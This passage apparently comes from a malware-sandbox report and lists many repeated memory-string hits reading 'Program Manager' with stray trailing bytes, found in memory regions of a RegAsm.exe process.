            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0.f
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<gs
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtUe
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qx>'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlF<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPNa
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q qO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`-M
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q Q1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<Fi
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q/A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt4[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@/+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql%2
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\fd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qDWI
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlEP
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<%_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q-k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,i4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL$k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp-(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh"B
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0UM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt\.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<M2
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt|L
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|In
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD\[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(E:
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT~*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd|V
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPt^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhbu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`SJ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q03Y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL+4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|(d
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHe5
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8$$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(DN
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPST
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@U(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlK/
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD}F
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlkM
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLm+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLMG
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhf%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`2z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`ts
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh!x
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp3A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8$E
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@3n
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,Lu
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0V9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<n<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD}e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXct
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q)(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q va
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qp1k
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtym
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`17
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL)?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT8h
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q u9
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX!*
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtXc
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD{Q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`Pk
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD[3
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXAB
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd{.
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd9-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql'
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxa=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|'<
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4{[
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`/a
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlhn
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL'i
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0RO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q021
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qlGd
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxc2
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql%
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\kW
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qJv
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXBK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<*R
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHc_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0TD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q("Z
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qt{C
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHBU
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qT:>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<lG
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(#-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`RA
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTYr
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(CE
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX6e
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdor
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|`,
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$s6
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxy$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxV`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD.m
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHyN
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHY0
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPFp
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(8I
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql_H
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerHjP
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qTq3
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8yX
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP%f
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qtO-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$q`
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\_R
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4PL
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$PV
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@H1
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxwK
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpEa
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qLa\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxy@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qL?l
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qD0C
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPHF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qXWo
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qphA
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qFT
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(Vt
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4OC
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpdy
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql=5
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<=b
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX5=
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(5j
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@gF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxU8
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q &A
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX4Q
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qh$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4Mm
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qxtl
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qd,6
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP$>
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qX3g
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\_q
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qH3w
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4,c
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@ep
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`&+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q@hO
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qhwU
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(6u
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q0hY
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q j-
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q 'J
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<`B
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdNI
            Source: RegAsm.exe, 00000006.00000002.3755465000.000000000323B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`&$
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qHxE
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q|;t
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q(7@
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qg^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`fV
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql^?
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`*O
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q4vI
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,D_
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qA+
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpk^
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q<Ck
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\cf
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_ql"4
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qP*Y
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q`L(
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qpJT
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qdtF
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\B\
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q,eJ
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q\!R
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q8:r
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qaC
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003264000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_qPKD
            Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR_q$ty
